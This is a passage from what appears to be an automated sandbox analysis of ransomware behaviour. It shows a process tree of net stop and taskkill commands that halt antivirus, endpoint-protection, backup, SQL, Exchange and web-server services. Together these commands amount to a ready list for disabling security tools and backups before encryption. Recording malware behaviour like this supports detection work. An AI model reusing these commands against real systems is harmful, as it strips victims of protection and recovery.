C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$TPS /y
4⤵
PID:964

C:\Windows\system32\net.exe
net stop SQLAgent$TPS /y
5⤵
PID:2204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
6⤵
PID:2728

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$TPSAMA /y
4⤵
PID:3004

C:\Windows\system32\net.exe
net stop SQLAgent$TPSAMA /y
5⤵
PID:360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
6⤵
PID:628

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:1308

C:\Windows\system32\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:2656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
6⤵
PID:2864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:4080

C:\Windows\system32\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
5⤵
PID:2640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
6⤵
PID:1176

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLBrowser /y
4⤵
PID:2224

C:\Windows\system32\net.exe
net stop SQLBrowser /y
5⤵
PID:2684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
6⤵
PID:836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLSafeOLRService /y
4⤵
PID:364

C:\Windows\system32\net.exe
net stop SQLSafeOLRService /y
5⤵
PID:3160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
6⤵
PID:2796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLSERVERAGENT /y
4⤵
PID:3636

C:\Windows\system32\net.exe
net stop SQLSERVERAGENT /y
5⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLTELEMETRY /y
4⤵
PID:1236

C:\Windows\system32\net.exe
net stop SQLTELEMETRY /y
5⤵
PID:1884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
6⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:3580

C:\Windows\system32\net.exe
net stop SQLTELEMETRY$ECWDB2 /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop mssql$vim_sqlexp /y
4⤵
PID:3768

C:\Windows\system32\net.exe
net stop mssql$vim_sqlexp /y
5⤵
PID:1020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
6⤵
PID:1280

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop IISAdmin /y
4⤵
PID:1708

C:\Windows\system32\net.exe
net stop IISAdmin /y
5⤵
PID:1568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
6⤵
PID:1040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop NetMsmqActivator /y
4⤵
PID:1704

C:\Windows\system32\net.exe
net stop NetMsmqActivator /y
5⤵
PID:2844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
6⤵
PID:2496

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop POP3Svc /y
4⤵
PID:3936

C:\Windows\system32\net.exe
net stop POP3Svc /y
5⤵
PID:2204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
6⤵
PID:2728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
5⤵
PID:240

C:\Windows\system32\net.exe
net stop KAVFS /y
6⤵
PID:420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
7⤵
PID:2168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SstpSvc /y
4⤵
PID:628

C:\Windows\system32\net.exe
net stop SstpSvc /y
5⤵
PID:1484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop UI0Detect /y
4⤵
PID:2864

C:\Windows\system32\net.exe
net stop UI0Detect /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
6⤵
PID:1308

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop W3Svc /y
4⤵
PID:1176

C:\Windows\system32\net.exe
net stop W3Svc /y
5⤵
PID:2020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
6⤵
PID:2640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "aphidmonitorservice" /y
4⤵
PID:836

C:\Windows\system32\net.exe
net stop "aphidmonitorservice" /y
5⤵
PID:3976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "aphidmonitorservice" /y
6⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "intel(r) proset monitoring service" /y
4⤵
PID:3340

C:\Windows\system32\net.exe
net stop "intel(r) proset monitoring service" /y
5⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "intel(r) proset monitoring service" /y
6⤵
PID:364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop unistoresvc_1af40a /y
4⤵
PID:3868

C:\Windows\system32\net.exe
net stop unistoresvc_1af40a /y
5⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop audioendpointbuilder /y
4⤵
PID:3372

C:\Windows\system32\net.exe
net stop audioendpointbuilder /y
5⤵
PID:3588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
6⤵
PID:1236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeES /y
4⤵
PID:2732

C:\Windows\system32\net.exe
net stop MSExchangeES /y
5⤵
PID:3580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
6⤵
PID:1792

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeIS /y
4⤵
PID:2824

C:\Windows\system32\net.exe
net stop MSExchangeIS /y
5⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
6⤵
PID:3476

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeMGMT /y
4⤵
PID:2304

C:\Windows\system32\net.exe
net stop MSExchangeMGMT /y
5⤵
PID:1040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
6⤵
PID:784

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeMTA /y
4⤵
PID:1044

C:\Windows\system32\net.exe
net stop MSExchangeMTA /y
5⤵
PID:2496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeSA /y
4⤵
PID:3164

C:\Windows\system32\net.exe
net stop MSExchangeSA /y
5⤵
PID:2728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
6⤵
PID:3004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
5⤵
PID:420

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSExchangeSRS /y
4⤵
PID:1484

C:\Windows\system32\net.exe
net stop MSExchangeSRS /y
5⤵
PID:628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
6⤵
PID:2656

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop msexchangeadtopology /y
4⤵
PID:244

C:\Windows\system32\net.exe
net stop msexchangeadtopology /y
5⤵
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
6⤵
PID:840

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop msexchangeimap4 /y
4⤵
PID:3424

C:\Windows\system32\net.exe
net stop msexchangeimap4 /y
5⤵
PID:2640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
6⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Agent" /y
4⤵
PID:3976

C:\Windows\system32\net.exe
net stop "Sophos Agent" /y
5⤵
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent" /y
6⤵
PID:488

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos AutoUpdate Service" /y
4⤵
PID:2796

C:\Windows\system32\net.exe
net stop "Sophos AutoUpdate Service" /y
5⤵
PID:364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Clean Service" /y
4⤵
PID:3484

C:\Windows\system32\net.exe
net stop "Sophos Clean Service" /y
5⤵
PID:3868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service" /y
6⤵
PID:2300

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Device Control Service" /y
4⤵
PID:740

C:\Windows\system32\net.exe
net stop "Sophos Device Control Service" /y
5⤵
PID:1628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
6⤵
PID:2256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos File Scanner Service" /y
4⤵
PID:1776

C:\Windows\system32\net.exe
net stop "Sophos File Scanner Service" /y
5⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
6⤵
PID:1352

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Health Service" /y
4⤵
PID:1884

C:\Windows\system32\net.exe
net stop "Sophos Health Service" /y
5⤵
PID:1236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service" /y
6⤵
PID:1688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos MCS Agent" /y
4⤵
PID:3848

C:\Windows\system32\net.exe
net stop "Sophos MCS Agent" /y
5⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
6⤵
PID:3064

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos MCS Client" /y
4⤵
PID:2448

C:\Windows\system32\net.exe
net stop "Sophos MCS Client" /y
5⤵
PID:2824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client" /y
6⤵
PID:1716

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Message Router" /y
4⤵
PID:2716

C:\Windows\system32\net.exe
net stop "Sophos Message Router" /y
5⤵
PID:1708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router" /y
6⤵
PID:3460

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Safestore Service" /y
4⤵
PID:4048

C:\Windows\system32\net.exe
net stop "Sophos Safestore Service" /y
5⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
6⤵
PID:4004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos System Protection Service" /y
4⤵
PID:2168

C:\Windows\system32\net.exe
net stop "Sophos System Protection Service" /y
5⤵
PID:3936

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Sophos Web Control Service" /y
4⤵
PID:2656

C:\Windows\system32\net.exe
net stop "Sophos Web Control Service" /y
5⤵
PID:628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
6⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop AcronisAgent /y
4⤵
PID:2696

C:\Windows\system32\net.exe
net stop AcronisAgent /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
6⤵
PID:3108

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop Antivirus /y’
4⤵
PID:2940

C:\Windows\system32\net.exe
net stop Antivirus /y’
5⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y’
6⤵
PID:268

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop AVP /y
4⤵
PID:2372

C:\Windows\system32\net.exe
net stop AVP /y
5⤵
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
6⤵
PID:2528

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop DCAgent /y
4⤵
PID:3700

C:\Windows\system32\net.exe
net stop DCAgent /y
5⤵
PID:364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop EhttpSrv /y
4⤵
PID:2300

C:\Windows\system32\net.exe
net stop EhttpSrv /y
5⤵
PID:1632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
6⤵
PID:3484

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ekrn /y
4⤵
PID:2256

C:\Windows\system32\net.exe
net stop ekrn /y
5⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop EPSecurityService /y
4⤵
PID:1352

C:\Windows\system32\net.exe
net stop EPSecurityService /y
5⤵
PID:1388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
6⤵
PID:1776

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop EPUpdateService /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop EPUpdateService /y
5⤵
PID:2444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
6⤵
PID:1884

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop EsgShKernel /y
4⤵
PID:3064

C:\Windows\system32\net.exe
net stop EsgShKernel /y
5⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
6⤵
PID:3860

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ESHASRV /y
4⤵
PID:1716

C:\Windows\system32\net.exe
net stop ESHASRV /y
5⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
6⤵
PID:2448

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop FA_Scheduler /y
4⤵
PID:1060

C:\Windows\system32\net.exe
net stop FA_Scheduler /y
5⤵
PID:1708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
6⤵
PID:3460

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop IMAP4Svc /y
4⤵
PID:4004

C:\Windows\system32\net.exe
net stop IMAP4Svc /y
5⤵
PID:1044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
6⤵
PID:4048

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop KAVFS /y
4⤵
PID:240

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop KAVFSGT /y
4⤵
PID:3576

C:\Windows\system32\net.exe
net stop KAVFSGT /y
5⤵
PID:628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
6⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop stop kavfsslp /y
4⤵
PID:2864

C:\Windows\system32\net.exe
net stop stop kavfsslp /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stop kavfsslp /y
6⤵
PID:3108

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop klnagent /y
4⤵
PID:1328

C:\Windows\system32\net.exe
net stop klnagent /y
5⤵
PID:3424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
6⤵
PID:2940

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop macmnsvc /y
4⤵
PID:2528

C:\Windows\system32\net.exe
net stop macmnsvc /y
5⤵
PID:3976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
6⤵
PID:2372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop masvc /y
4⤵
PID:3288

C:\Windows\system32\net.exe
net stop masvc /y
5⤵
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
6⤵
PID:3700

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MBAMService /y
4⤵
PID:3868

C:\Windows\system32\net.exe
net stop MBAMService /y
5⤵
PID:1632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
6⤵
PID:3484

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MBEndpointAgent /y
4⤵
PID:1720

C:\Windows\system32\net.exe
net stop MBEndpointAgent /y
5⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop McAfeeEngineService /y
4⤵
PID:1776

C:\Windows\system32\net.exe
net stop McAfeeEngineService /y
5⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
6⤵
PID:1352

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop McAfeeFramework /y
4⤵
PID:1884

C:\Windows\system32\net.exe
net stop McAfeeFramework /y
5⤵
PID:1236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
6⤵
PID:1688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:3732

C:\Windows\system32\net.exe
net stop McAfeeFrameworkMcAfeeFramework /y
5⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
6⤵
PID:3860

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop McShield /y
4⤵
PID:2448

C:\Windows\system32\net.exe
net stop McShield /y
5⤵
PID:1020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
6⤵
PID:1716

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop McTaskManager /y
4⤵
PID:3460

C:\Windows\system32\net.exe
net stop McTaskManager /y
5⤵
PID:1040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop mfefire /y
4⤵
PID:1704

C:\Windows\system32\net.exe
net stop mfefire /y
5⤵
PID:1044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
6⤵
PID:4048

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop mfemms /y
4⤵
PID:3936

C:\Windows\system32\net.exe
net stop mfemms /y
5⤵
PID:3164

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop mfevtp /y
4⤵
PID:2652

C:\Windows\system32\net.exe
net stop mfevtp /y
5⤵
PID:2088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
6⤵
PID:3576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SOPHOS /y
4⤵
PID:3108

C:\Windows\system32\net.exe
net stop MSSQL$SOPHOS /y
5⤵
PID:2696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
6⤵
PID:2864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop sacsvr /y
4⤵
PID:1176

C:\Windows\system32\net.exe
net stop sacsvr /y
5⤵
PID:3424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
6⤵
PID:2940

C:\Windows\system32\taskkill.exe
taskkill /im ocssd.exe /F
7⤵
- Kills process with taskkill
PID:628

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SAVAdminService /y
4⤵
PID:836

C:\Windows\system32\net.exe
net stop SAVAdminService /y
5⤵
PID:1304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
6⤵
PID:3976

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SAVService /y
4⤵
PID:3700

C:\Windows\system32\net.exe
net stop SAVService /y
5⤵
PID:364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop stop SepMasterService /y
4⤵
PID:2292

C:\Windows\system32\net.exe
net stop stop SepMasterService /y
5⤵
PID:1624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stop SepMasterService /y
6⤵
PID:3868

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ShMonitor /y
4⤵
PID:2256

C:\Windows\system32\net.exe
net stop ShMonitor /y
5⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop Smcinst /y
4⤵
PID:1392

C:\Windows\system32\net.exe
net stop Smcinst /y
5⤵
PID:1388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
6⤵
PID:1776

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SmcService /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop SmcService /y
5⤵
PID:3372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
6⤵
PID:1236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SntpService /y
4⤵
PID:3860

C:\Windows\system32\net.exe
net stop SntpService /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
6⤵
PID:3732

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop sophossps /y
4⤵
PID:1716

C:\Windows\system32\net.exe
net stop sophossps /y
5⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
6⤵
PID:2448

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SOPH
4⤵
PID:2304

C:\Windows\system32\net.exe
net stop SQLAgent$SOPH
5⤵
PID:1040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPH
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop svcGenericHost /y
4⤵
PID:2480

C:\Windows\system32\net.exe
net stop svcGenericHost /y
5⤵
PID:1044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
6⤵
PID:4048

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop swi_filter /y
4⤵
PID:420

C:\Windows\system32\net.exe
net stop swi_filter /y
5⤵
PID:2168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
6⤵
PID:3936

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop swi_service /y
4⤵
PID:628

C:\Windows\system32\net.exe
net stop swi_service /y
5⤵
PID:3136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
6⤵
PID:2088

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop swi_update /y
4⤵
PID:2864

C:\Windows\system32\net.exe
net stop swi_update /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
6⤵
PID:3108

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop swi_update_64 /y
4⤵
PID:2640

C:\Windows\system32\net.exe
net stop swi_update_64 /y
5⤵
PID:3424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
6⤵
PID:1548

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop TmCCSF /y
4⤵
PID:2372

C:\Windows\system32\net.exe
net stop TmCCSF /y
5⤵
PID:1304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
6⤵
PID:3168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop tmlisten /y
4⤵
PID:2796

C:\Windows\system32\net.exe
net stop tmlisten /y
5⤵
PID:248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
6⤵
PID:3380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop TrueKey /y
4⤵
PID:1168

C:\Windows\system32\net.exe
net stop TrueKey /y
5⤵
PID:1624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
6⤵
PID:3940

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop TrueKeyScheduler /y
4⤵
PID:740

C:\Windows\system32\net.exe
net stop TrueKeyScheduler /y
5⤵
PID:2244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
6⤵
PID:2844

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop TrueKeyServiceHel
4⤵
PID:1776

C:\Windows\system32\net.exe
net stop TrueKeyServiceHel
5⤵
PID:1388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHel
6⤵
PID:2288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop WRSVC /y
4⤵
PID:3588

C:\Windows\system32\net.exe
net stop WRSVC /y
5⤵
PID:1660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
6⤵
PID:996

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop vapiendpoint /y
4⤵
PID:1792

C:\Windows\system32\net.exe
net stop vapiendpoint /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
6⤵
PID:256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im savfmsesp.exe /f
4⤵
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /im savfmsesp.exe /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im sqbcoreservice.exe /F
4⤵
PID:2204

C:\Windows\system32\taskkill.exe
taskkill /im sqbcoreservice.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im sqbcoreservice.exe /F
4⤵
PID:1044

C:\Windows\system32\taskkill.exe
taskkill /im sqbcoreservice.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im zoolz.exe /F
4⤵
PID:3936

C:\Windows\system32\taskkill.exe
taskkill /im zoolz.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:240

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im firefoxconfig.exe /F
4⤵
PID:2652

C:\Windows\system32\taskkill.exe
taskkill /im firefoxconfig.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im tbirdconfig.exe /F
4⤵
PID:3108

C:\Windows\system32\taskkill.exe
taskkill /im tbirdconfig.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im thunderbird.exe /F
4⤵
PID:3976

C:\Windows\system32\taskkill.exe
taskkill /im thunderbird.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im agntsvc.exe /F
4⤵
PID:2328

C:\Windows\system32\taskkill.exe
taskkill /im agntsvc.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im dbeng50.exe /F
4⤵
PID:3168

C:\Windows\system32\taskkill.exe
taskkill /im dbeng50.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im dbsnmp.exe /F
4⤵
PID:364

C:\Windows\system32\taskkill.exe
taskkill /im dbsnmp.exe /F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c taskkill /im isqlplussvc.exe /F
4⤵
PID:1624

C:\Windows\system32\taskkill.exe
taskkill /im isqlplussvc.exe /F
